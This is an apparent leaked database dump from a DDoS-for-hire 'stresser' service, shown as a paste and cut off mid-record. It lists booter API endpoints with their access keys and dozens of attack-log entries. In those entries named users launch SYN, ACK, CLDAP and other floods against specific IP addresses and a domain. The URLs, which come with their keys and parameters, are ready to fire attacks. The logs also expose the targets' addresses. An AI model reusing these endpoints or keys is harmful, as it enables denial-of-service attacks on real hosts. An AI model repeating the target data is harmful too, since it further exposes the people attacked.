· 8 years ago · Aug 10, 2018, 03:12 PM
1-- Leaked by Nazma
2
3
4-- MySQL dump 10.15 Distrib 10.0.35-MariaDB, for debian-linux-gnu (x86_64)
5--
6-- Host: localhost Database: gumstres
7-- ------------------------------------------------------
8-- Server version 10.0.35-MariaDB-0+deb8u1
9
10/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
11/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
12/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
13/*!40101 SET NAMES utf8 */;
14/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
15/*!40103 SET TIME_ZONE='+00:00' */;
16/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
17/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
18/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
19/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
20
21--
22-- Current Database: `gumstres`
23--
24
25
26--
27-- Table structure for table `apis`
28--
29
30DROP TABLE IF EXISTS `apis`;
31/*!40101 SET @saved_cs_client = @@character_set_client */;
32/*!40101 SET character_set_client = utf8 */;
33CREATE TABLE `apis` (
34 `id` int(11) NOT NULL AUTO_INCREMENT,
35 `apiurl` varchar(255) NOT NULL,
36 `stopurl` varchar(255) NOT NULL,
37 `methods` varchar(255) NOT NULL,
38 `notes` varchar(255) NOT NULL,
39 PRIMARY KEY (`id`)
40) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=latin1;
41/*!40101 SET character_set_client = @saved_cs_client */;
42
43--
44-- Dumping data for table `apis`
45--
46
47LOCK TABLES `apis` WRITE;
48/*!40000 ALTER TABLE `apis` DISABLE KEYS */;
49INSERT INTO `apis` VALUES (15,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=[method]','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP','[\"CLDAP\",\"NFO\",\"ACK\",\"SYN\",\"G-HTTP\"]',''),(18,'http://185.157.247.19/sasa.php?&key=natha555&host=[host]&port=[port]&time=[time]&method=[method]&user=test','http://185.157.247.19/sasa.php?&key=natha555&host=[host]&port=[port]&time=[time]&method=[method]&user=test','[\"HAVEN\",\"UDPLAG\"]','');
50/*!40000 ALTER TABLE `apis` ENABLE KEYS */;
51UNLOCK TABLES;
52
53--
54-- Table structure for table `attacklogs`
55--
56
57DROP TABLE IF EXISTS `attacklogs`;
58/*!40101 SET @saved_cs_client = @@character_set_client */;
59/*!40101 SET character_set_client = utf8 */;
60CREATE TABLE `attacklogs` (
61 `id` int(11) NOT NULL AUTO_INCREMENT,
62 `user` varchar(15) NOT NULL,
63 `ip` varchar(15) NOT NULL,
64 `port` int(11) NOT NULL,
65 `time` int(11) NOT NULL,
66 `method` varchar(10) NOT NULL,
67 `type` varchar(10) NOT NULL,
68 `sid` int(11) NOT NULL,
69 `apiurl` varchar(255) NOT NULL,
70 `stopurl` varchar(255) NOT NULL,
71 `date` int(11) NOT NULL,
72 PRIMARY KEY (`id`)
73) ENGINE=MyISAM AUTO_INCREMENT=149 DEFAULT CHARSET=latin1;
74/*!40101 SET character_set_client = @saved_cs_client */;
75
76--
77-- Dumping data for table `attacklogs`
78--
79
80LOCK TABLES `attacklogs` WRITE;
81/*!40000 ALTER TABLE `attacklogs` DISABLE KEYS */;
82INSERT INTO `attacklogs` VALUES (1,'sasa971','46.238.185.103',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=a67e40aae1a2494410e720a3764d29f4&tool=boot&host=46.238.185.103&port=%port%&time=60&method=CLDAP','http://api.undisclosed.to/api.php?key=a67e40aae1a2494410e720a3764d29f4&tool=boot&host=[host]&port=%port%&time=[time]&method=STOP ',1533651927),(2,'sasa971','46.238.185.103',80,0,'NFO','api',0,'http://api.undisclosed.to/api.php?key=a67e40aae1a2494410e720a3764d29f4&tool=boot&host=46.238.185.103&port=%port%&time=60&method=NFO','http://api.undisclosed.to/api.php?key=a67e40aae1a2494410e720a3764d29f4&tool=boot&host=[host]&port=%port%&time=[time]&method=STOP ',1533651957),(3,'sasa971','46.238.185.103',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.103&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533652133),(4,'sasa971','46.238.185.103',80,0,'NFO','api',0,'http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=46.238.185.103&port=80&time=60&method=NFO','http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533652317),(5,'sasa971','46.238.185.103',80,60,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.103&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533652352),(6,'sasa971','46.238.185.103',80,0,'ACK','api',0,'http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=46.238.185.103&port=80&time=60&method=ACK','http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=[host]&port=[port]&time=[time]&method=[method]',1533652471),(7,'sasa971','77.206.240.190',80,0,'NFO','api',0,'http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=77.206.240.190&port=80&time=60&method=NFO','http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=[host]&port=[port]&time=[time]&method=[method]',1533652693),(8,'sasa971','46.238.185.103',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=46.238.185.103&port=80&time=60&method=CLDAP','http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533652761),(9,'sasa971','46.238.185.103',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=46.238.185.103&port=80&time=60','http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=[host]&port=[port]&time=[time]',1533653534),(10,'sasa971','46.238.185.103',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=46.238.185.103&port=80&time=60','http://api.undisclosed.to/api.php?key=755535e4140d9b55ebc5b163a4aaaf3d&tool=boot&host=[host]&port=[port]&time=[time]',1533653670),(11,'sasa971','46.238.185.103',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=[method]',1533653876),(12,'sasa971','46.238.185.103',80,0,'NFO','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=NFO','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533654107),(13,'sasa971','46.238.185.103',80,0,'UDPLAG','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=UDPLAG','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533654227),(14,'sasa971','46.238.185.103',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.103&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533654254),(15,'sasa971','46.238.185.103',80,0,'UDPLAG','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=UDPLAG','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533654810),(16,'sasa971','46.238.185.103',80,0,'HAVEN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=HAVEN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533654846),(17,'sasa971','46.238.185.103',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.103&port=80&time=60&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533654887),(18,'sasa971','http://perfectr',80,0,'GHTTP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=http://perfectregedit.cf&port=80&time=60&method=GHTTP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533654993),(19,'sasa971','46.238.185.103',80,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533655021),(20,'sasa971','http://perfectr',80,0,'GHTTP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=http://perfectregedit.cf/&port=80&time=60&method=GHTTP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533657147),(21,'sasa971','195.20.48.212',80,60,'GHTTP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=195.20.48.212&port=80&time=60&method=GHTTP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533657211),(22,'kuky14lf','50.19.165.83',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=50.19.165.83&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533658764),(23,'kuky14lf','34.195.130.140',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=34.195.130.140&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533658829),(24,'kuky14lf','34.234.26.30',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=34.234.26.30&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533658887),(25,'kuky14lf','34.195.130.140',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=34.195.130.140&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533659129),(26,'kuky14lf','34.234.26.30',443,600,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=34.234.26.30&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533659185),(27,'kuky14lf','52.70.174.110',443,600,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=52.70.174.110&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533659250),(28,'Achlyys','90.51.56.41',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=90.51.56.41&port=80&time=2300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533663011),(29,'Achlyys','90.51.98.69',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=90.51.98.69&port=80&time=2300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533663098),(30,'Achlyys','88.171.209.237',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=88.171.209.237&port=80&time=2300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533663167),(31,'sasa971','46.238.185.103',80,0,'HAVEN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=HAVEN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533665304),(32,'sasa971','46.238.185.103',80,60,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.103&port=80&time=60&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533665328),(33,'sasa971','http://perfectr',80,0,'G-HTTP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=http://perfectregedit.cf/&port=80&time=100&method=G-HTTP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533665416),(34,'sasa971','46.238.185.103',80,0,'HAVEN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=HAVEN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533665471),(35,'sasa971','46.238.185.103',80,0,'HAVEN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=HAVEN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533665536),(36,'sasa971','46.238.185.103',80,0,'G-HTTP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=G-HTTP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533665610),(37,'sasa971','46.238.185.103',80,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=60&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533665641),(38,'sasa971','46.238.185.103',80,60,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.103&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533665720),(39,'sasa971','46.238.185.103',80,60,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.103&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533665804),(40,'sasa971','77.206.240.190',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=77.206.240.190&port=80&time=60&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533666164),(41,'sasa971','163.172.61.64',80,0,'ACK','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=163.172.61.64&port=80&time=60&method=ACK','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533666347),(42,'sasa971','163.172.61.64',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=163.172.61.64&port=80&time=60&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533666400),(43,'sasa971','46.238.185.103',80,0,'CLDAP','api',0,'http://api.instant-stresser.se/api.php?clef=8e2f8174d83b584&outil=boot&host=46.238.185.103&port=80&temps=%3Ctemps%3E&type=[type]&serveur=[Standard]','http://api.instant-stresser.se/api.php?clef=8e2f8174d83b584&outil=boot&host=[host]&port=[port]&temps=%3Ctemps%3E&type=[type]&serveur=[Standard]',1533666756),(44,'sasa971','46.238.185.103',80,300,'ACK','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=46.238.185.103&port=80&time=300&method=ACK','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533666818),(45,'K1NGARU','173.178.227.169',80,300,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=173.178.227.169&port=80&time=300&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533668168),(46,'sasa971','46.238.185.104',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.104&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533668381),(47,'Achlyys','62.210.11.66',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=62.210.11.66&port=80&time=2300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533668421),(48,'Achlyys','62.210.11.66',80,2300,'ACK','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=62.210.11.66&port=80&time=2300&method=ACK','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533668441),(49,'sasa971','176.138.162.202',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=176.138.162.202&port=80&time=300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533668612),(50,'Achlyys','80.255.5.229',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=80.255.5.229&port=80&time=2300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533671336),(51,'Achlyys','80.255.5.229',80,2300,'ACK','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=80.255.5.229&port=80&time=2300&method=ACK','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533671409),(52,'Achlyys','2.4.149.22',80,0,'ACK','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=2.4.149.22&port=80&time=2300&method=ACK','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533673847),(53,'Achlyys','2.4.149.22',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=2.4.149.22&port=80&time=2300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533673909),(54,'Achlyys','2.4.149.22',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=2.4.149.22&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533673946),(55,'Achlyys','2.4.149.22',80,2300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=2.4.149.22&port=80&time=2300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533674081),(56,'sasa971','2.4.149.22',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=2.4.149.22&port=80&time=300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533674167),(57,'sasa971','2.4.149.22',80,300,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=2.4.149.22&port=80&time=300&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533674282),(58,'K1NGARU','78.231.123.77',80,10,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=78.231.123.77&port=80&time=10&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533674412),(59,'sasa971','46.238.185.104',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.104&port=80&time=60&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533674418),(60,'K1NGARU','212.47.240.168',80,10,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=212.47.240.168&port=80&time=10&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533674506),(61,'K1NGARU','213.166.210.151',80,0,'NFO','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=213.166.210.151&port=80&time=60&method=NFO','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533674521),(62,'K1NGARU','82.125.137.48',80,60,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.125.137.48&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533674555),(63,'K1NGARU','90.37.250.122 ',80,60,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=90.37.250.122 &port=80&time=60&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533674582),(64,'sasa971','2.4.149.22',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=2.4.149.22&port=80&time=300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533674618),(65,'K1NGARU','82.235.193.109 ',80,10,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=82.235.193.109 &port=80&time=10&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533674630),(66,'sasa971','2.4.149.22',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=2.4.149.22&port=80&time=300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533674678),(67,'sasa971','90.31.49.213',80,60,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.31.49.213&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533674870),(68,'Achlyys','90.113.219.241',80,0,'ACK','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=90.113.219.241&port=80&time=2300&method=ACK','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533674904),(69,'Achlyys','90.113.219.241',13532,2300,'ACK','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=90.113.219.241&port=13532&time=2300&method=ACK','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533675018),(70,'sasa971','2.4.149.22',443,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=2.4.149.22&port=443&time=300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533675156),(71,'Achlyys','90.113.219.241',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.113.219.241&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533675166),(72,'sasa971','2.4.149.22',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=2.4.149.22&port=80&time=300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533675232),(73,'sasa971','90.31.49.213',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.31.49.213&port=80&time=60&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533675324),(74,'Achlyys','108.171.80.209',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=108.171.80.209&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533675437),(75,'sasa971','90.31.49.213',80,300,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.31.49.213&port=80&time=300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533675457),(76,'Achlyys','89.86.173.62',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=89.86.173.62&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533675491),(77,'K1NGARU','89.155.108.41',80,300,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=89.155.108.41&port=80&time=300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533681567),(78,'sasa971','46.238.185.105',80,60,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.105&port=80&time=60&method=UDPLAG&user=test','http://185.157.247